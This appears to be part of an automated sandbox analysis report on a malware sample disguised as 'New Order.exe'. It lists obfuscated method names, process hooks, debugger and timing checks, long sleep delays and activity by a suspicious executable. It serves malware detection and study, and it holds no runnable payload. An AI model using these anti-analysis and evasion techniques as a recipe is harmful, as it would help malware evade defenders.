                Source: 1.2.New Order.exe.4006340.0.raw.unpack, ELY8UFH2PglgVjiHZY1.csHigh entropy of concatenated method names: 'ToString', 'jnhXtDudCg', 'I4wXBDLb8M', 'HhiXAQpvc6', 'xeMXpiLoB9', 'QpCXEfT7x1', 'lHyXFrV2hL', 'Tt9XiInX9H', 'PvFZ8XCUG71xwiyTyqJ', 'RZ8kZxCNoqfWpbPjWcW'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, efPLxH2TqBFckGjeSR.csHigh entropy of concatenated method names: 'hUUjah354', 'ecBQtjfDm', 'y3X7DK13R', 'nQ9GGCR5b', 'j1BB5JGSI', 'rsqA3MZua', 'kxqeAEb2blXEJDHTwn', 'yqkwC2xDDjfTh94FQR', 'aelrb7V6l', 'Gu0woRAII'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, UUoQ7m0jItuerthGfx.csHigh entropy of concatenated method names: 'ToString', 'C5O8L2Hp2H', 'Dfl8EbqgT8', 'Ydb8FcsssY', 'G968iYUPIt', 'ipa8y8Tgvd', 'EBL8Cl7oxj', 'lIh8WB6NbS', 'j1h8aRJG3R', 'rZY8Uq6HpI'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, oGZrgJB7JtgxmQBWKY.csHigh entropy of concatenated method names: 'ykLVQG22Pg', 'nt9V7bmWNJ', 'YMSVt3N64c', 'NwwVBax4H4', 'rOhVID4MqP', 'Y1WV8wo0pT', 'g98VhqAH4Y', 'WXLVruVNWI', 'VehVSGF8tw', 'lhWVwh3ElO'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, vWyMUjUEPh6pAHEOAY.csHigh entropy of concatenated method names: 'lOHkJhkWgc', 'KY5kM01ErO', 'u3EkjBj6v2', 'DupkQgRTLm', 'r7Mk5L9tQT', 'yZpk701eYt', 'tGOkGbLqC3', 'jJxktS56aJ', 'i37kBTfiDF', 'efikAOXMk1'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, X1i88aq7m6arQ2ji8w.csHigh entropy of concatenated method names: 'WyndtMyewX', 'QPwdBroYYI', 'IFVdpyPsBt', 'HUCdEQiAi4', 'BsadiAASNa', 'M3NdyXgpDy', 'wo7dWlkd2i', 'IbLdaTjDiw', 'lmBdoEkF7B', 'w8WdLL4Gbo'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, FdaFyJu2nRBL1qwfYH.csHigh entropy of concatenated method names: 'm7WHkXOu74', 'VGvHDIK3VB', 'x7JHvtgxmQ', 'EWKHRYOGe2', 'PCaHIj7Lxo', 'ATfH87PnUC', 'eT3T49Us6xvfcvl6eq', 'KX0pwfNJkxsGqaWkIP', 'w6qHHO4etQ', 'bMFHxISJTa'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.csHigh entropy of concatenated method names: 'VOlxb272id', 'QLyx4EBed4', 'oSTxN5Bl5L', 'JFOxVktjxy', 'rELxlu9UKP', 'DgCxYlxHbe', 'QWixkNyQa1', 'etQxDXP2Ic', 'AB8xsW5q9M', 'OK0xvyKVlQ'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, DAoITCHHL9yAmQEF0Sb.csHigh entropy of concatenated method names: 'nocwT9wKa6', 'vTcwzcMrxj', 'CVTXOIIkbG', 'noPXHVs3je', 'PD7X2OIQ6D', 'rJdXx6JrsS', 'lFnXuaP9A6', 'xd0XbQ1PJP', 'VgyX4oqfQJ', 'U5eXNkXGXj'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M8cPLRTsQ9BrfNo7Xb.csHigh entropy of concatenated method names: 'fdgwVvbVGU', 'dakwlfWNHp', 'c1JwY9gM3r', 'oalwk1hbMF', 'svcwSDoUKL', 'MQkwDUdCom', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, qSVPwRK1hd7HZJZpIU.csHigh entropy of concatenated method names: 'I4WhvCmcJj', 'PoxhRNawhm', 'ToString', 'P3Wh46aOhn', 'KAAhN72uFU', 'rHohVPVad0', 'G1HhlhVM1e', 'IGphYDJaZe', 'VnahkUdGG9', 'Y56hDosrCL'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, CuT4rCHueTPBYquwsAX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GCrgSmbY1w', 'AyugwcFWUf', 'L6DgX20SCa', 'JDXggNyeNZ', 'WbLg63XRDe', 'ym2geI7WYr', 'kQ2gPUpetr'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, AQkNgb9hTCZmeIj6A0.csHigh entropy of concatenated method names: 'dGZh3Ek89C', 'tvOhTk3COq', 'GfjrOVcJKc', 'ONtrH3WI4D', 'udZhLobbUd', 'iohhZ8J9pt', 'e0ChqgEe3D', 'wRFhmnxuLF', 'kN4hcmG6Q7', 'LaEh0QEu70'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, ODjTiQNTVBNJuwqxEj.csHigh entropy of concatenated method names: 'Dispose', 'rynHni9p3O', 'Ejt2EuRWdE', 'vqOg1SwkWY', 'FbVHT47TG2', 'inEHz45vmG', 'ProcessDialogKey', 'wPD2OPwJ44', 'R3J2H1leqj', 'LPO22U8cPL'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, OxoQTfp7PnUCwN14no.csHigh entropy of concatenated method names: 'QCAYbCe3md', 'ftZYNHEy0p', 'OanYle6ZnM', 'Yv5YkUS4BK', 'vHkYDMvbAh', 'b2Il116Q71', 'y1yl9gBvpE', 'QB0lfJstp7', 'd7el3axQ8C', 'df1lnKpJXZ'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, POu82VzOwjvaboP5Q9.csHigh entropy of concatenated method names: 'pv0w74oaSx', 'Vtwwtj9MqT', 'CbSwB2RIrk', 'he3wpwbTfB', 'GWDwEpx03a', 'iIBwiAv03l', 'rr9wyJUB93', 'lyHwPncare', 'UgowJUM4fS', 'idswMssxgI'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, oBUAdVV1wigcc8Q33F.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZO2nWwvkR', 'i9Q2TsPfqy', 'RvM2zLPufV', 'BBpxO41WLf', 'vDixHM9Jkc', 'hiMx2tANAp', 'vWCxxjyohf', 'N8TIZlXr5uAiiIDvmEQ'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, F57NpumPsJJ6L4hEiw.csHigh entropy of concatenated method names: 'g0MIoT50Ia', 'QvHIZn6G1R', 'NdqImQij9L', 'xkPIcwoimd', 'LtSIEVv2Fk', 'hISIF5mr5b', 'U6cIiQRsRf', 'zDwIycV0Jj', 'omPICf6ABA', 'H2vIWrVTd2'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, XcFZQ5Wb4jiCmTJ1Nt.csHigh entropy of concatenated method names: 'uKsk4lQj3M', 'PeEkV3mXtX', 'pDwkYm4cHs', 'd5XYTDMMNi', 'GOEYzBWdvf', 'ebckO2rNEn', 'h3YkHQxait', 'qTNk2y22RS', 'C2mkxLdr3d', 'uJSkuB6wiP'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, kPwJ44nc3J1leqjaPO.csHigh entropy of concatenated method names: 'ylJSpnZueR', 'M4QSEUrE51', 'O5NSFKa8QW', 'wKNSim7WC0', 'p1RSyRBumo', 'zKsSCcswEO', 'gJKSWQtYZR', 'wUHSakDYcB', 'blJSUMQrSf', 'glvSoX3mV6'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, KXOu74t9GvIK3VBWFs.csHigh entropy of concatenated method names: 'ebUNmb8pH1', 'vdWNcxqhRR', 'C2MN06w06o', 'sONNKa9xC0', 'MumN1RLuq7', 'B4wN9gbtus', 'n1YNfRCirg', 'z4FN38kRlg', 'rBdNnZTd2h', 'zUZNT0gIa2'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, ucqiXrfx0Syni9p3OA.csHigh entropy of concatenated method names: 'xj7SIwEh7I', 'KP2ShtRn4I', 'f4ZSSjPUSM', 'BJWSXZVnYw', 'IxTS6LZAxg', 'cjMSP2ecGi', 'Dispose', 'Tqxr4Js272', 'LLwrN3I7Lk', 'hArrVMTLSc'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, ELY8UFH2PglgVjiHZY1.csHigh entropy of concatenated method names: 'ToString', 'jnhXtDudCg', 'I4wXBDLb8M', 'HhiXAQpvc6', 'xeMXpiLoB9', 'QpCXEfT7x1', 'lHyXFrV2hL', 'Tt9XiInX9H', 'PvFZ8XCUG71xwiyTyqJ', 'RZ8kZxCNoqfWpbPjWcW'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, efPLxH2TqBFckGjeSR.csHigh entropy of concatenated method names: 'hUUjah354', 'ecBQtjfDm', 'y3X7DK13R', 'nQ9GGCR5b', 'j1BB5JGSI', 'rsqA3MZua', 'kxqeAEb2blXEJDHTwn', 'yqkwC2xDDjfTh94FQR', 'aelrb7V6l', 'Gu0woRAII'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, UUoQ7m0jItuerthGfx.csHigh entropy of concatenated method names: 'ToString', 'C5O8L2Hp2H', 'Dfl8EbqgT8', 'Ydb8FcsssY', 'G968iYUPIt', 'ipa8y8Tgvd', 'EBL8Cl7oxj', 'lIh8WB6NbS', 'j1h8aRJG3R', 'rZY8Uq6HpI'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, oGZrgJB7JtgxmQBWKY.csHigh entropy of concatenated method names: 'ykLVQG22Pg', 'nt9V7bmWNJ', 'YMSVt3N64c', 'NwwVBax4H4', 'rOhVID4MqP', 'Y1WV8wo0pT', 'g98VhqAH4Y', 'WXLVruVNWI', 'VehVSGF8tw', 'lhWVwh3ElO'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, vWyMUjUEPh6pAHEOAY.csHigh entropy of concatenated method names: 'lOHkJhkWgc', 'KY5kM01ErO', 'u3EkjBj6v2', 'DupkQgRTLm', 'r7Mk5L9tQT', 'yZpk701eYt', 'tGOkGbLqC3', 'jJxktS56aJ', 'i37kBTfiDF', 'efikAOXMk1'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, X1i88aq7m6arQ2ji8w.csHigh entropy of concatenated method names: 'WyndtMyewX', 'QPwdBroYYI', 'IFVdpyPsBt', 'HUCdEQiAi4', 'BsadiAASNa', 'M3NdyXgpDy', 'wo7dWlkd2i', 'IbLdaTjDiw', 'lmBdoEkF7B', 'w8WdLL4Gbo'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, FdaFyJu2nRBL1qwfYH.csHigh entropy of concatenated method names: 'm7WHkXOu74', 'VGvHDIK3VB', 'x7JHvtgxmQ', 'EWKHRYOGe2', 'PCaHIj7Lxo', 'ATfH87PnUC', 'eT3T49Us6xvfcvl6eq', 'KX0pwfNJkxsGqaWkIP', 'w6qHHO4etQ', 'bMFHxISJTa'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.csHigh entropy of concatenated method names: 'VOlxb272id', 'QLyx4EBed4', 'oSTxN5Bl5L', 'JFOxVktjxy', 'rELxlu9UKP', 'DgCxYlxHbe', 'QWixkNyQa1', 'etQxDXP2Ic', 'AB8xsW5q9M', 'OK0xvyKVlQ'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, DAoITCHHL9yAmQEF0Sb.csHigh entropy of concatenated method names: 'nocwT9wKa6', 'vTcwzcMrxj', 'CVTXOIIkbG', 'noPXHVs3je', 'PD7X2OIQ6D', 'rJdXx6JrsS', 'lFnXuaP9A6', 'xd0XbQ1PJP', 'VgyX4oqfQJ', 'U5eXNkXGXj'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M8cPLRTsQ9BrfNo7Xb.csHigh entropy of concatenated method names: 'fdgwVvbVGU', 'dakwlfWNHp', 'c1JwY9gM3r', 'oalwk1hbMF', 'svcwSDoUKL', 'MQkwDUdCom', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, qSVPwRK1hd7HZJZpIU.csHigh entropy of concatenated method names: 'I4WhvCmcJj', 'PoxhRNawhm', 'ToString', 'P3Wh46aOhn', 'KAAhN72uFU', 'rHohVPVad0', 'G1HhlhVM1e', 'IGphYDJaZe', 'VnahkUdGG9', 'Y56hDosrCL'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, CuT4rCHueTPBYquwsAX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GCrgSmbY1w', 'AyugwcFWUf', 'L6DgX20SCa', 'JDXggNyeNZ', 'WbLg63XRDe', 'ym2geI7WYr', 'kQ2gPUpetr'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, AQkNgb9hTCZmeIj6A0.csHigh entropy of concatenated method names: 'dGZh3Ek89C', 'tvOhTk3COq', 'GfjrOVcJKc', 'ONtrH3WI4D', 'udZhLobbUd', 'iohhZ8J9pt', 'e0ChqgEe3D', 'wRFhmnxuLF', 'kN4hcmG6Q7', 'LaEh0QEu70'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, ODjTiQNTVBNJuwqxEj.csHigh entropy of concatenated method names: 'Dispose', 'rynHni9p3O', 'Ejt2EuRWdE', 'vqOg1SwkWY', 'FbVHT47TG2', 'inEHz45vmG', 'ProcessDialogKey', 'wPD2OPwJ44', 'R3J2H1leqj', 'LPO22U8cPL'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, OxoQTfp7PnUCwN14no.csHigh entropy of concatenated method names: 'QCAYbCe3md', 'ftZYNHEy0p', 'OanYle6ZnM', 'Yv5YkUS4BK', 'vHkYDMvbAh', 'b2Il116Q71', 'y1yl9gBvpE', 'QB0lfJstp7', 'd7el3axQ8C', 'df1lnKpJXZ'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, POu82VzOwjvaboP5Q9.csHigh entropy of concatenated method names: 'pv0w74oaSx', 'Vtwwtj9MqT', 'CbSwB2RIrk', 'he3wpwbTfB', 'GWDwEpx03a', 'iIBwiAv03l', 'rr9wyJUB93', 'lyHwPncare', 'UgowJUM4fS', 'idswMssxgI'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, oBUAdVV1wigcc8Q33F.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZO2nWwvkR', 'i9Q2TsPfqy', 'RvM2zLPufV', 'BBpxO41WLf', 'vDixHM9Jkc', 'hiMx2tANAp', 'vWCxxjyohf', 'N8TIZlXr5uAiiIDvmEQ'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, F57NpumPsJJ6L4hEiw.csHigh entropy of concatenated method names: 'g0MIoT50Ia', 'QvHIZn6G1R', 'NdqImQij9L', 'xkPIcwoimd', 'LtSIEVv2Fk', 'hISIF5mr5b', 'U6cIiQRsRf', 'zDwIycV0Jj', 'omPICf6ABA', 'H2vIWrVTd2'

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: New Order.exe PID: 3224, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\w32tm.exe API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\w32tm.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\w32tm.exe API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\w32tm.exe API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\w32tm.exe API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\w32tm.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\w32tm.exe API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\w32tm.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\New Order.exe Memory allocated: 2CF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Order.exe Memory allocated: 2F30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Order.exe Memory allocated: 7DE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Order.exe Memory allocated: 75F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Order.exe Memory allocated: 8DE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Order.exe Memory allocated: 9DE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Order.exe Code function: 8_2_0184096E rdtsc 8_2_0184096E
                Source: C:\Users\user\Desktop\New Order.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3213
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1067
                Source: C:\Windows\SysWOW64\w32tm.exe Window / User API: threadDelayed 1175
                Source: C:\Windows\SysWOW64\w32tm.exe Window / User API: threadDelayed 8797
                Source: C:\Users\user\Desktop\New Order.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\w32tm.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\New Order.exe TID: 936 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7176 Thread sleep count: 1175 > 30
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7176 Thread sleep time: -2350000s >= -30000s
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7176 Thread sleep count: 8797 > 30
                Source: C:\Windows\SysWOW64\w32tm.exe TID: 7176 Thread sleep time: -17594000s >= -30000s
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260 Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260 Thread sleep count: 33 > 30
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260 Thread sleep time: -49500s >= -30000s
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260 Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe TID: 7260 Thread sleep time: -34000s >= -30000s
                Source: C:\Windows\SysWOW64\w32tm.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\w32tm.exe Code function: 14_2_0096CE00 FindFirstFileW,FindNextFileW,FindClose,14_2_0096CE00
                Source: C:\Users\user\Desktop\New Order.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\New Order.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\w32tm.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\New Order.exe Code function: 8_2_0184096E rdtsc 8_2_0184096E
                Source: C:\Users\user\Desktop\New Order.exe Code function: 8_2_00417EA3 LdrLoadDll,8_2_00417EA3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01882349 mov eax, dword ptr fs:[00000030h]8_2_01882349
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov ecx, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188035C mov eax, dword ptr fs:[00000030h]8_2_0188035C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A8350 mov ecx, dword ptr fs:[00000030h]8_2_018A8350
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CA352 mov eax, dword ptr fs:[00000030h]8_2_018CA352
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F8397 mov eax, dword ptr fs:[00000030h]8_2_017F8397
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F8397 mov eax, dword ptr fs:[00000030h]8_2_017F8397
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F8397 mov eax, dword ptr fs:[00000030h]8_2_017F8397
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A437C mov eax, dword ptr fs:[00000030h]8_2_018A437C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE388 mov eax, dword ptr fs:[00000030h]8_2_017FE388
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE388 mov eax, dword ptr fs:[00000030h]8_2_017FE388
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE388 mov eax, dword ptr fs:[00000030h]8_2_017FE388
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E284 mov eax, dword ptr fs:[00000030h]8_2_0183E284
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E284 mov eax, dword ptr fs:[00000030h]8_2_0183E284
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01880283 mov eax, dword ptr fs:[00000030h]8_2_01880283
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01880283 mov eax, dword ptr fs:[00000030h]8_2_01880283
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01880283 mov eax, dword ptr fs:[00000030h]8_2_01880283
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F826B mov eax, dword ptr fs:[00000030h]8_2_017F826B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov ecx, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018962A0 mov eax, dword ptr fs:[00000030h]8_2_018962A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FA250 mov eax, dword ptr fs:[00000030h]8_2_017FA250
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
